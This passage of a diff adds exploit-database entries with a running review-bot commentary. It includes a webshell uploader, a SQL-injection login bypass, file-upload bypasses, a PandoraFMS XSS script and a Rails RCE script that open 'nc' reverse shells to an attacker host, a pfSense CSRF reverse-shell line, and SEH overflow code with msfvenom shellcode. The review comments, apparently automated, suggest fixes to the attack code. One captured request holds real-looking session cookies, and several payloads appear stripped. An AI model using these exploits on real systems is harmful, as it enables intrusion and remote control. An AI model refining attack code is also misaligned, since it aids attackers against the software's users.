Quitting.') + quit() + get_profile = s.get(url=PROFILE_URL, verify=False) + Name = str(re.findall(r'name="studentname" value=".*"', get_profile.text)) + Name = re.sub('^.*name="studentname" value="', '', Name) + Name = re.sub('".*$', '', Name) + PinCode = str(re.findall(r'name="Pincode" readonly value=".*"', get_profile.text)) + PinCode = re.sub('^.*name="Pincode" readonly value="', '', PinCode) + PinCode = re.sub('".*$', '', PinCode) + RegNo = str(re.findall(r'name="studentregno" value=".*"', get_profile.text)) + RegNo = re.sub('^.*name="studentregno" value="', '', RegNo) + RegNo = re.sub('".*$', '', RegNo) + print(ok+'{studentname:'+Name+', Pincode:'+PinCode+', studentregno:'+RegNo+'}') + avatar_img = { + 'photo': + ( + 'kaio-ken.php', + '', + 'image/png', + {'Content-Disposition': 'form-data'} + ) + } + upld_data = {'studentname':Name, 'studentregno':RegNo,'Pincode':PinCode,'cgpa':'0.00','submit':''} + webshell_upload = s.post(url=PROFILE_URL, files=avatar_img, data=upld_data, verify=False) + print(ok+'Uploaded webshell. Now connecting via POST requests using telepathy.') + webshell(SERVER_URL, s) \ No newline at end of file diff --git a/exploits/php/webapps/48705.txt b/exploits/php/webapps/48705.txt new file mode 100644 index 000000000..6def3b344 --- /dev/null +++ b/exploits/php/webapps/48705.txt 
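Review bot: `redirectURL` is assigned only inside the `if auth_bypass.history:` loop, so when the login POST returns no redirect the following `re.match(r".*change-password.php", redirectURL)` raises `NameError` instead of reaching the 'Failed to bypass' message; initialise `redirectURL = ''` before the `if`. The final message says "connecting via POST requests" while the loop in `webshell` uses `requests.get(WEB_SHELL, params=command, ...)`, so one of the two is wrong. `urllib` is imported but unused, and the bare `except:` in `webshell` swallows KeyboardInterrupt; `except Exception:` is the intended scope.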
@@ -0,0 +1,29 @@ +# Exploit Title: elaniin CMS 1.0 - Authentication Bypass +# Google Dork: N/A +# Date: 2020-07-14 +# Exploit Author: BKpatron +# Vendor Homepage:https://elaniin.com/ +# Software Link:https://github.com/elaniin/CMS/archive/master.zip +# Version: v1.0 +# Tested on: Win 10 +# CVE: N/A + +# Vulnerability: Attacker can bypass login page and access to dashboard page +# vulnerable file : login.php +# Parameter & Payload: '=''or' +# Proof of Concept: +http://localhost/elaniin/login.php + +POST /elaniin/login.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; +Content-Length: 334 +Referer:http://localhost/elaniin/login.php +Cookie: PHPSESSID=33snzxs8qht0gvh0fpd27vg62 +Connection: close +Upgrade-Insecure-Requests: 1 +email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=LOGIN \ No newline at end of file diff --git a/exploits/php/webapps/48706.txt b/exploits/php/webapps/48706.txt new file mode 100644 index 000000000..aa2a1d5b8 --- /dev/null +++ b/exploits/php/webapps/48706.txt 
@@ -0,0 +1,76 @@ +# Exploit Title: Koken CMS 0.22.24 - Arbitrary File Upload (Authenticated) +# Date: 2020-07-15 +# Exploit Author: v1n1v131r4 +# Vendor Homepage: http://koken.me/ +# Software Link: https://www.softaculous.com/apps/cms/Koken +# Version: 0.22.24 +# Tested on: Linux +# PoC: https://github.com/V1n1v131r4/Bypass-File-Upload-on-Koken-CMS/blob/master/README.md + +The Koken CMS upload restrictions are based on a list of allowed file extensions (withelist), which facilitates bypass through the handling of the HTTP request via Burp. + +Steps to exploit: + +1. Create a malicious PHP file with this content: + + + +2. Save as "image.php.jpg" + +3. Authenticated, go to Koken CMS Dashboard, upload your file on "Import Content" button (Library panel) and send the HTTP request to Burp. + +4. On Burp, rename your file to "image.php" + + +POST /koken/api.php?/content HTTP/1.1 +Host: target.com +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://target.com/koken/admin/ +x-koken-auth: cookie +Content-Type: multipart/form-data; boundary=---------------------------2391361183188899229525551 +Content-Length: 1043 +Connection: close +Cookie: PHPSESSID= [Cookie value here] + +-----------------------------2391361183188899229525551 +Content-Disposition: form-data; name="name" + +image.php +-----------------------------2391361183188899229525551 +Content-Disposition: form-data; name="chunk" + +0 +-----------------------------2391361183188899229525551 +Content-Disposition: form-data; name="chunks" + +1 +-----------------------------2391361183188899229525551 +Content-Disposition: form-data; name="upload_session_start" + +1594831856 +-----------------------------2391361183188899229525551 +Content-Disposition: form-data; name="visibility" + +public +-----------------------------2391361183188899229525551 +Content-Disposition: form-data; name="license" + +all 
+-----------------------------2391361183188899229525551 +Content-Disposition: form-data; name="max_download" + +none +-----------------------------2391361183188899229525551 +Content-Disposition: form-data; name="file"; filename="image.php" +Content-Type: image/jpeg + + + +-----------------------------2391361183188899229525551-- + + + +5. On Koken CMS Library, select you file and put the mouse on "Download File" to see where your file is hosted on server. \ No newline at end of file diff --git a/exploits/php/webapps/48707.txt b/exploits/php/webapps/48707.txt new file mode 100644 index 000000000..4630d3270 --- /dev/null +++ b/exploits/php/webapps/48707.txt 
@@ -0,0 +1,118 @@ +# Exploit Title: PandoraFMS 7.0 NG 746 - Persistent Cross-Site Scripting +# Date: 2020-07-01 +# Author: AppleBois +# Version: 7xx ≤ 746 +# Homepage: https://pandorafms.org/ +# Software Link: https://sourceforge.net/projects/pandora/files/Pandora FMS 7.0NG/ +# CVE-2020-11749 +# +# By asking network administrator to scan SNMP device to trigger Cross Site Scripting(XSS) +# We can call a remote JavaScript file to execute arbitrary code to reach Remote Code Execution +# on PandoraFMS. +# +###################################################################################### + +//----------------/etc/snmp/snmpd.conf-------------------// +syscontact +syslocation +sysname +sysDesc + +com2sec local localhost public +view systemview included .1.3.6.1.2.1.1 +view systemview included .1.3.6.1.2.1.25.1 +view systemview included .1 80 + +rocommunity public +//--------------end of /etc/snmp/snmpd.conf--------------// + + + +//----------------shell.js-------------------------------// +//Create Random String +function randomString(len, charSet) { + charSet = charSet || 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'; + var randomString = ''; + for (var i = 0; i < len; i++) { + var randomPoz = Math.floor(Math.random() * charSet.length); + randomString += charSet.substring(randomPoz,randomPoz+1); + } + return randomString; +} +var randomValue = randomString(5); + +//Declare Variable +var xhr= new XMLHttpRequest(); +var Attacker_IP= "192.168.11.130"; +var Pandora_IP ="192.168.11.132"; +var port ="4444"; +//var payload="form_name="+randomValue+"&form_plugin_type=0&form_max_timeout5f09468e5082e_select=15&form_max_timeout5f09468e5082e_text=15&form_max_timeout=15&form_max_timeout5f09468e5082e_units=1&form_description=Created+By+AppleBois&form_execute=nc+-nv+"+Attacker_IP+"+"+port+"+-e+%2Fbin%2Fsh&form_parameters=&field1_macro=_field1_&field1_desc=&field1_value=&field1_help=&crtbutton=Create" +var payload 
="form_name="+randomValue+"&form_plugin_type=0&form_max_timeout5f096ea47b224_select=15&form_max_timeout5f096ea47b224_text=15&form_max_timeout=15&form_max_timeout5f096ea47b224_units=1&form_description=Created+By+AppleBois&form_execute=nc+-nv+"+Attacker_IP+"+"+port+"+-e+%2Fbin%2Fsh&form_parameters=&field1_macro=_field1_&field1_desc=&field1_value=&uptbutton=Update" +var url= "http://"+Pandora_IP+"/pandora_console/index.php?sec=gservers&sec2=godmode/servers/plugin&tab=plugins&create_plugin=1&pure="; + +//Create a plugin with malicous command +xhr.open("POST",url,true); +xhr.setRequestHeader("User-Agent","Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"); +xhr.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*//'*;q=0.8"); +xhr.setRequestHeader("Accept-Language","en-US,en;q=0.5"); +xhr.setRequestHeader("Accept-Encoding","gzip, deflate"); +xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); +xhr.setRequestHeader("Referer","http://"+Pandora_IP+"/pandora_console/index.php?sec=gservers&sec2=godmode/servers/plugin&tab=&view=1&tab=plugins&pure="); +xhr.setRequestHeader("Content-Length",payload.length); +xhr.setRequestHeader("Connection","close"); +xhr.setRequestHeader("Upgrade-Insecure-Requests","1"); +xhr.send(payload); + +//I am sleepy, i just want to sleep 5 seconds. 
Please +function sleep(miliseconds) { + var currentTime = new Date().getTime(); + while (currentTime + miliseconds >= new Date().getTime()) { + } + } +sleep(5000); + +//Grab newly added Plugin ID +var url="/pandora_console/index.php?sec=gagente&sec2=godmode/agentes/configurar_agente&tab=module&id_agente=2"; +xhr.open("POST",url,false); +xhr.setRequestHeader("User-Agent","Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"); +xhr.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*//'*;q=0.8"); +xhr.setRequestHeader("Accept-Language","en-US,en;q=0.5"); +xhr.setRequestHeader("Accept-Encoding","gzip, deflate"); +xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); +xhr.setRequestHeader("Referer","http://"+Pandora_IP+"/pandora_console/index.php?sec=gservers&sec2=godmode/servers/plugin&tab=&view=1&tab=plugins&pure="); +xhr.setRequestHeader("Content-Length",payload.length); +xhr.setRequestHeader("Connection","close"); +xhr.setRequestHeader("Upgrade-Insecure-Requests","1"); +xhr.setRequestHeader("Cache-Control","max-age=0"); +var payload ="status_hierachy_mode_sent=1&moduletype=pluginserver&edit_module=1&updbutton=Create"; +xhr.send(payload) + +var el = document.createElement('html'); +var add=xhr.responseText.toString(); +el.innerHTML = add; +var dd = el.querySelector('#id_plugin'); +var plugin_ID =0; +for (i = 0; i < dd.options.length; i++) { + if(dd.options[i].text == randomValue) + { + console.log(dd.options[i].value); + plugin_ID=dd.options[i].value; + break; + } +} + +//Create a new plugin in server module || reverse shell will trigger here +var url = "http://"+Pandora_IP+"/pandora_console/index.php?sec=gagente&sec2=godmode/agentes/configurar_agente&tab=module&id_agente=2"; +var payload 
="network_component_group=0&id_module_component_type=4&network_component=0&name=AppleBois_"+randomValue+"&disabled_sent=1&id_module_group=1&id_module_type_hidden=1&id_module_type=1&type_names=eyIxIjoiZ2VuZXJpY19kYXRhIiwiMiI6ImdlbmVyaWNfcHJvYyIsIjMiOiJnZW5lcmljX2RhdGFfc3RyaW5nIiwiNCI6ImdlbmVyaWNfZGF0YV9pbmMiLCI1IjoiZ2VuZXJpY19kYXRhX2luY19hYnMifQ%3D%3D&min_warning=0&max_warning=0&str_warning=&warning_inverse_sent=1&min_critical=0&max_critical=0&str_critical=&critical_inverse_sent=1&history_data=1&history_data_sent=1&id_plugin="+plugin_ID+"¯os=eyIxIjp7Im1hY3JvIjoiX2ZpZWxkMV8iLCJkZXNjIjoiIiwiaGVscCI6IiIsInZhbHVlIjoiIiwiaGlkZSI6IiJ9fQ%3D%3D¯o_name%5B%5D=macro_value&custom_id=&unit_select=none&unit_text=&unit=&module_interval_select=300&module_interval_text=5&module_interval=300&module_interval_units=60&moduletype=4&post_process_select=&post_process_text=&post_process=&min=&max=&dynamic_interval_select=0&dynamic_interval_text=&dynamic_interval=None&dynamic_interval_units=1&dynamic_min=0&dynamic_max=0&dynamic_two_tailed_sent=1&id_export=0&throw_unknown_events_sent=1&ff_type_sent=1&each_ff=0&ff_event=0&ff_event_normal=&ff_event_warning=&ff_event_critical=&module_ff_interval=0&ff_timeout=0&id_tag_selected%5B%5D=&id_tag_policy%5B%5D=&quiet_module_sent=1&cps_module=0&description=&critical_instructions=&warning_instructions=&unknown_instructions=&hour_from=*&minute_from=*&mday_from=*&month_from=*&wday_from=*&hour_to=*&minute_to=*&mday_to=*&month_to=*&wday_to=*&max_timeout=0&max_retries=0&id_category=0&parent_module_id=0&autocomplete_agent_name=&agent_autocomplete_idagent_5f0967a872ce2=0&relation_type=direct&crtbutton=Create&id_module=4&create_module=1"; +xhr.open("POST",url,true); +xhr.setRequestHeader("User-Agent","Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"); +xhr.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); +xhr.setRequestHeader("Accept-Language","en-US,en;q=0.5"); 
+xhr.setRequestHeader("Accept-Encoding","gzip, deflate"); +xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); +xhr.setRequestHeader("Referer","http://"+Pandora_IP+"/pandora_console/index.php?sec=gagente&sec2=godmode/agentes/configurar_agente&tab=module&id_agente=2"); +xhr.setRequestHeader("Content-Length",payload.length); +xhr.setRequestHeader("Connection","close"); +xhr.setRequestHeader("Upgrade-Insecure-Requests","1"); +xhr.send(payload); +//----------------end of shell.js-------------------------------// \ No newline at end of file diff --git a/exploits/php/webapps/48709.txt b/exploits/php/webapps/48709.txt new file mode 100644 index 000000000..0ba847766 --- /dev/null +++ b/exploits/php/webapps/48709.txt 
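Review bot: In the `shell.js` block `url` and `payload` are each declared with `var` three times and the `for (i = 0; ...)` loop over `dd.options` never declares `i`, so it becomes an implicit global; a reader cannot tell which `payload` the later `xhr.setRequestHeader("Content-Length", payload.length)` refers to without tracing assignment order. Declare each value once at its first use with `let` under a distinct name (for example `createPluginPayload`, `listModulesPayload`, `createModulePayload`) and write `for (let i = 0; ...)`. The `Accept` header literal `*//'*;q=0.8` on the first two requests also looks mangled relative to the `*/*;q=0.8` used on the third, and the `snmpd.conf` block lists `syscontact`/`syslocation`/`sysname`/`sysDesc` with no values, so the page no longer shows what the SNMP scan ingests; both look like extraction damage and should be checked against the original advisory.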
@@ -0,0 +1,51 @@
+# Exploit Title: Webtareas 2.1p - Arbitrary File Upload (Authenticated)
+# Author: AppleBois
+# Date: 2020-07-10
+# Exploit author : AppleBois
+# Vendor Hompage:https://sourceforge.net/projects/webtareas/
+# Version: 2.1 && 2.1p
+# Tested on: Window 10 64 bit environment || XAMPP
+# Authenticated User allowed to upload ".exe" and ".shtml" to file uploaded directory
+# More information : https://medium.com/@tehwinsam/webtareas-2-1-c8b406c68c2a
+
+POST /Tareas/webtareas/linkedcontent/addfile.php?doc_type=0&doc_type_ex=&doc_id=1&borne15=0&borne16=0 HTTP/1.1
+Host: 10.10.10.2:81
+Content-Length: 711
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://10.10.10.2:81
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHtJ36OtVyQuyaY6y
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://10.10.10.2:81/Tareas/webtareas/linkedcontent/addfile.php?doc_type=0&doc_id=1&borne15=0&borne16=0
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: webTareasSID=vqg1lbhf9g5esjrie84dsrjjhg; ASP.NET_SessionId=vbrb31kd3s5hmz3uobg0smck; UserSettings=language=1; dnn_IsMobile=False; .ASPXANONYMOUS=VA9hDh-1Ldg0FPbBfd9HAWSTqKjasYcZMlHQnpPaoR5WQipK7Q_kKnAlAqfWp0WgtO8HXH2_Tsrhfh-Z7137cng_MeEp3aiMPswVEPZc-UOdZQTp0; __RequestVerificationToken_L0ROTg2=Js5PUWl0BiY3kJLdEPU2oEna_UsEFTrNQiGY986uBwWdRyVDxr2ItTPSUBd07QX6rRyfXQ2; USERNAME_CHANGED=; language=en-US; authentication=DNN; .DOTNETNUKE=CC547735526446773F995D833FACDA646745AE4409516EBF345F1AC725F7D7CE7BFC420BF5EFE9FE2AEC92B04C89CCD2E64C34BA4E195D7D8D6EED7892574DB3FF02599F; ICMSSESSION=mgnp26oubn7hfc590q6j5c9o70
+Connection: close
+
+------WebKitFormBoundaryHtJ36OtVyQuyaY6y
+Content-Disposition: form-data; name="action"
+
+add
+------WebKitFormBoundaryHtJ36OtVyQuyaY6y
+Content-Disposition: form-data; name="file1"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundaryHtJ36OtVyQuyaY6y
+Content-Disposition: form-data; name="attnam1"
+
+a.shtml
+------WebKitFormBoundaryHtJ36OtVyQuyaY6y
+Content-Disposition: form-data; name="atttmp1"
+
+C:/xampp/htdocs/Tareas/webtareas/files/tmpEDE7.tmp
+------WebKitFormBoundaryHtJ36OtVyQuyaY6y
+Content-Disposition: form-data; name="c"
+
+
+------WebKitFormBoundaryHtJ36OtVyQuyaY6y
+Content-Disposition: form-data; name="ver"
+
+1.0
+------WebKitFormBoundaryHtJ36OtVyQuyaY6y--
\ No newline at end of file
diff --git a/exploits/php/webapps/48714.txt b/exploits/php/webapps/48714.txt
new file mode 100644
index 000000000..f1809bd8b
--- /dev/null
+++ b/exploits/php/webapps/48714.txt
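Review bot: The `Cookie:` header of the captured request carries several session and anti-forgery tokens that have nothing to do with webTareas (`ASP.NET_SessionId`, `.ASPXANONYMOUS`, `__RequestVerificationToken_L0ROTg2`, `.DOTNETNUKE`, `ICMSSESSION`), copied straight from the author's browser; a published PoC should keep only the application's own `webTareasSID` cookie and replace its value with a placeholder such as `[session id here]`, since real session material in an advisory is leaked credential data and noise for the reader. Once the cookie line is trimmed the literal `Content-Length: 711` no longer matches anyway, so it is better shown as a placeholder too. The header also repeats the author twice (`# Author:` and `# Exploit author :`) and misspells "Homepage"; one author line is enough.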
@@ -0,0 +1,40 @@
+# Exploit Title: pfSense 2.4.4-p3 - Cross-Site Request Forgery
+# Date: 2019-09-27
+# Exploit Author: ghost_fh
+# Vendor Homepage: https://www.pfsense.org/
+# Software Link: https://www.pfsense.org/download/index.html?section=downloads
+# Version: Till 2.4.4-p3
+# Tested on: freebsd
+# CVE : CVE-2019-16667
+
+# Vulnerability Description :- The pfsense firewall is vulnerable to RCE
+# chained with CSRF as it uses `csrf magic` library since it allows to tamper
+# the CSRF token values submitted when processing the form requests. Due to
+# this flaw, an attacker can exploit this vulnerability by crafting new page
+# that contains attacker's controlled input such as a "reverse shell" (eg:
+# `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip port
+# >/tmp/f`token value) in the form and entice the victims to click
+# on the crafted link via social engineering methods. Once the victim clicks
+# on the link (try again button in this case), the attacker can take the
+# lateral control of the victim's machine and malicious actions can be
+# performed on the victim's behalf.
+
+
+
+
+
+
+
+
+# Create a malicious page containing the above values and once user clicks on malicious link,
+# he will be redirected to https://pfsense_ip/diag_command.php page.
+# Victim will be greeted with the "Try again" button.
+# Once victim clicks on the "Try again" button you will be greeted with reverse shell of the victim.
\ No newline at end of file
diff --git a/exploits/php/webapps/48715.txt b/exploits/php/webapps/48715.txt
new file mode 100644
index 000000000..150301ec8
--- /dev/null
+++ b/exploits/php/webapps/48715.txt
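Review bot: The closing instructions refer to "the above values", but between "performed on the victim's behalf." and "# Create a malicious page" the hunk shows only empty `+` lines, and the `@@ -0,0 +1,40 @@` header counts 40 lines against the 32 that are readable here, so the HTML form the description depends on appears to have been dropped on extraction; the page should either restore it or state explicitly that the form is omitted. The description also says the attacker takes "lateral control of the victim's machine", whereas `diag_command.php` runs the submitted command on the pfSense host itself and the victim's browser only carries the forged request; rewording that makes clear to readers which system is exposed. Likewise "it uses `csrf magic` library since it allows to tamper the CSRF token values" reads as if the library itself is the flaw, and should presumably say that its token check could be bypassed in the affected versions.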
@@ -0,0 +1,40 @@
+# Exploit Title: Virtual Airlines Manager 2.6.2 - Persistent Cross-Site Scripting
+# Google Dork: inurl:"/vam/index_vam_op.php"
+# Date: 2020-06-29
+# Exploit Author: Peter Blue
+# Vendor Homepage: https://virtualairlinesmanager.net
+# Software Link: https://virtualairlinesmanager.net
+# Version: 2.6.2
+# Tested on: Linux (Fedora 23), MariaDB, PHP 5.6.29, Apache
+# CVE: N/A
+
+
+This project looks nice but lacks a lot of input filtering.
+
+This example allows a logged-in user to inject JavaScript code, and this
+case steal a session ID, but other exploits could be injected.
+
+This exploit example assumes you have installed VAM 2.6.2 on a local server.
+
+Steps :-
+
+1. Log on. There is an admin account: Callsign: vam100, Password: 123456
+
+2. Click "Pilot Actions"
+
+3. Click "Internal Mail"
+
+4. Click New Message
+
+5. In "Subject" enter XSS
+
+6. in "Message" type anything
+
+7. Click "Send"
+
+8. When the page refreshes your PHP session ID will show in an alert box
+
+It is also quite possible to inject raw HTML into the subject.
+
+A bit of Google Dorking revealed many websites running this, some were
+dead, some deserted and a few were live.
\ No newline at end of file
diff --git a/exploits/ruby/webapps/48716.rb b/exploits/ruby/webapps/48716.rb
new file mode 100755
index 000000000..690692267
--- /dev/null
+++ b/exploits/ruby/webapps/48716.rb
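Review bot: Step 5 says only `In "Subject" enter XSS`, yet step 8 expects the PHP session ID to appear in an alert box, so the text that is actually typed into the subject is not shown and the reproduction cannot be followed; the markup was presumably stripped on extraction and the step should describe in prose what is entered, or the original should be restored. The write-up also presents the stock admin account (`vam100` / `123456`) purely as a reproduction aid; one sentence pointing out that the default credentials themselves are a finding defenders should act on would make the advisory more useful.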
@@ -0,0 +1,32 @@
+# Exploit Title: Rails 5.0.1 - Remote Code Execution
+# Date: 2020-07-19
+# Exploit Author: Lucas Amorim
+# Vendor Homepage: www.rubyonrails.org
+# Software Link: www.rubyonrails.org
+# Version: Rails < 5.0.1
+# Tested on: Linux/OSx
+# CVE : CVE-2020-8163
+# More information: https://github.com/sh286/CVE-2020-8163
+
+#!/usr/bin/ruby
+
+require 'net/http'
+
+def header
+ puts "[*] - CVE-2020-8163 - Remote code execution of user-provided local names in Rails < 5.0.1\n"
+ puts "[*] - Author: Lucas Amorim lucas@lucasamorim.ca"
+ puts "[*] - Usage: \n"
+ puts "ruby exploit.rb "
+end
+if ARGV.length < 3
+ header
+ exit(-1)
+end
+
+url = ARGV[0]
+ip = ARGV[1]
+port = ARGV[2]
+
+puts "[*] Sending payload to #{url}"
+uri = URI(url+"?system(%27nc+-e+/bin/sh+#{ip}+#{port}%27)%3ba%23")
+Net::HTTP.get(uri)
\ No newline at end of file
diff --git a/exploits/windows/dos/48697.py b/exploits/windows/dos/48697.py
new file mode 100755
index 000000000..38f894619
--- /dev/null
+++ b/exploits/windows/dos/48697.py
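Review bot: The `#!/usr/bin/ruby` line sits on line 11, after the comment header, so it is an ordinary comment and the file is not directly executable despite its 100755 mode; it belongs on line 1. The same misplaced shebang (`#!/usr/bin/python` after the header) appears in 48689.py and 48691.py and in the file that precedes 48689.py, whose diff header is not visible in this chunk. The usage line `puts "ruby exploit.rb "` prints nothing after the script name, presumably because angle-bracket placeholders were stripped on extraction; it should name the three positional arguments the script reads from `ARGV`, e.g. `puts "ruby exploit.rb URL IP PORT"`. `exit(-1)` yields status 255 on Unix; `exit(1)` is the conventional usage-error code.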
@@ -0,0 +1,33 @@
+# Exploit Title: Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)
+# Date: 2020-07-20
+# Author: Felipe Winsnes
+# Software Link: https://www.exploit-db.com/apps/463c9e7fe9a39888d3c01bc9ad756bba-UpSetup.exe
+# Version: 3.5
+# Tested on: Windows 7 (x86)
+
+# Blog: https://whitecr0wz.github.io/
+
+# Sadly enough, this vulnerability is not exploitable as there are no friendly PPR addresses available and
+# yet the vulnerability is triggered with additional padding == can't use addresses with null values.
+
+# Proof of Concept:
+# 1.- Run the python script, it will create a new file "poc.txt".
+# 2.- Copy the content of the new file 'poc.txt' to clipboard.
+# 3.- Open the Application.
+# 4.- Click on "Settings".
+# 4.- Paste contents of the generated file into the parameters "FTP Address", "Username" and Password". Furthermore, check the box with the statement "Check to save password in preferences".
+# 5.- Crashed.
+# 6.- As uploadpref.dat is generated, every time the application opens it will crash, with the SEH values being overwritten. In order to stop this behavior simply delete the file.
+
+# If the contents are only pasted into "Password", the application will only crash once without creating uploadpref.dat.
+
+buffer = "A" * 477 + "BBBB" + "CCCC" + "\xff" * 2000
+
+try:
+ f = open ("poc.txt", "w")
+ f.write(buffer)
+ f.close()
+ print "[+] The file has been created successfully!"
+
+except:
+ print "[!] There has been an error while creating the file."
\ No newline at end of file
diff --git a/exploits/windows/local/48687.py b/exploits/windows/local/48687.py
new file mode 100755
index 000000000..c4a0d9e5a
--- /dev/null
+++ b/exploits/windows/local/48687.py
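Review bot: The bare `except:` around the file write catches everything, including `KeyboardInterrupt` and `SystemExit`, and prints a fixed message that hides the real cause, while `f` stays open if `f.write` raises before `f.close()`. Use a context manager and a narrow handler: `with open("poc.txt", "w") as f: f.write(buffer)` inside the `try`, then `except IOError as e:` and `print "[!] There has been an error while creating the file: %s" % e`. The `print` statements make this Python 2 only, and that matters for correctness as well as style: under Python 3 the `"\xff" * 2000` string written in text mode would be encoded as two bytes per character, so a `# Python 2 only` note next to the header (or `open(..., "wb")` with a bytes literal) would save the next user a confusing run. The step list also numbers two items "4.-".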
@@ -0,0 +1,66 @@ +# Exploit Title: Nidesoft DVD Ripper 5.2.18 - Local Buffer Overflow (SEH) +# Date: 2020-07-26 +# Author: Felipe Winsnes +# Software Link: https://nidesoft-dvd-ripper.softonic.com/ +# Version: 5.2.18 +# Tested on: Windows 7 (x86) + +# Blog: https://whitecr0wz.github.io/ + +# Proof of Concept: +# 1.- Run the python script, it will create the file "poc.txt". +# 2.- Copy the content of the new file "poc.txt" to clipboard +# 3.- Open the application. +# 4.- Paste the clipboard into the "License Code" parameter within registration. +# 5.- Profit. + +import struct + +# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread -b "\x00\x0a\x0d" +# Payload size: 448 bytes + +buf = b"" +buf += b"\x89\xe5\xda\xda\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49" +buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" +buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" +buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" +buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x6d\x38\x4c" +buf += b"\x42\x33\x30\x73\x30\x37\x70\x55\x30\x6c\x49\x6b\x55" +buf += b"\x35\x61\x49\x50\x32\x44\x6e\x6b\x42\x70\x66\x50\x6c" +buf += b"\x4b\x56\x32\x74\x4c\x6c\x4b\x42\x72\x75\x44\x6c\x4b" +buf += b"\x54\x32\x31\x38\x74\x4f\x58\x37\x51\x5a\x31\x36\x55" +buf += b"\x61\x6b\x4f\x4c\x6c\x77\x4c\x33\x51\x53\x4c\x35\x52" +buf += b"\x76\x4c\x51\x30\x4f\x31\x78\x4f\x74\x4d\x67\x71\x38" +buf += b"\x47\x68\x62\x4b\x42\x46\x32\x30\x57\x6c\x4b\x71\x42" +buf += b"\x62\x30\x6e\x6b\x61\x5a\x57\x4c\x6c\x4b\x70\x4c\x54" +buf += b"\x51\x63\x48\x49\x73\x63\x78\x43\x31\x4e\x31\x43\x61" +buf += b"\x6c\x4b\x50\x59\x31\x30\x63\x31\x59\x43\x4e\x6b\x77" +buf += b"\x39\x44\x58\x79\x73\x77\x4a\x62\x69\x4c\x4b\x66\x54" +buf += b"\x6c\x4b\x47\x71\x78\x56\x70\x31\x39\x6f\x4c\x6c\x6f" +buf += b"\x31\x58\x4f\x34\x4d\x46\x61\x4b\x77\x46\x58\x4d\x30" +buf += b"\x53\x45\x5a\x56\x45\x53\x73\x4d\x39\x68\x67\x4b\x73" +buf += 
b"\x4d\x51\x34\x74\x35\x79\x74\x53\x68\x6e\x6b\x33\x68" +buf += b"\x67\x54\x47\x71\x69\x43\x71\x76\x4e\x6b\x74\x4c\x30" +buf += b"\x4b\x4c\x4b\x73\x68\x47\x6c\x67\x71\x48\x53\x4c\x4b" +buf += b"\x54\x44\x4c\x4b\x36\x61\x68\x50\x6b\x39\x61\x54\x77" +buf += b"\x54\x76\x44\x63\x6b\x63\x6b\x31\x71\x32\x79\x72\x7a" +buf += b"\x52\x71\x39\x6f\x4b\x50\x31\x4f\x61\x4f\x73\x6a\x6e" +buf += b"\x6b\x65\x42\x48\x6b\x6e\x6d\x61\x4d\x43\x5a\x45\x51" +buf += b"\x4c\x4d\x6e\x65\x6f\x42\x57\x70\x67\x70\x43\x30\x30" +buf += b"\x50\x45\x38\x35\x61\x6c\x4b\x72\x4f\x6f\x77\x39\x6f" +buf += b"\x79\x45\x6f\x4b\x6b\x50\x65\x4d\x67\x5a\x74\x4a\x65" +buf += b"\x38\x6d\x76\x4f\x65\x6d\x6d\x4f\x6d\x49\x6f\x39\x45" +buf += b"\x67\x4c\x67\x76\x73\x4c\x47\x7a\x4f\x70\x4b\x4b\x69" +buf += b"\x70\x32\x55\x47\x75\x6d\x6b\x30\x47\x44\x53\x63\x42" +buf += b"\x62\x4f\x42\x4a\x75\x50\x43\x63\x6b\x4f\x4e\x35\x71" +buf += b"\x73\x31\x71\x30\x6c\x55\x33\x54\x6e\x62\x45\x74\x38" +buf += b"\x53\x55\x65\x50\x41\x41" + +nseh = "\xEB\x11\x41\x41" +seh = struct.pack(" Pack +# 4. 
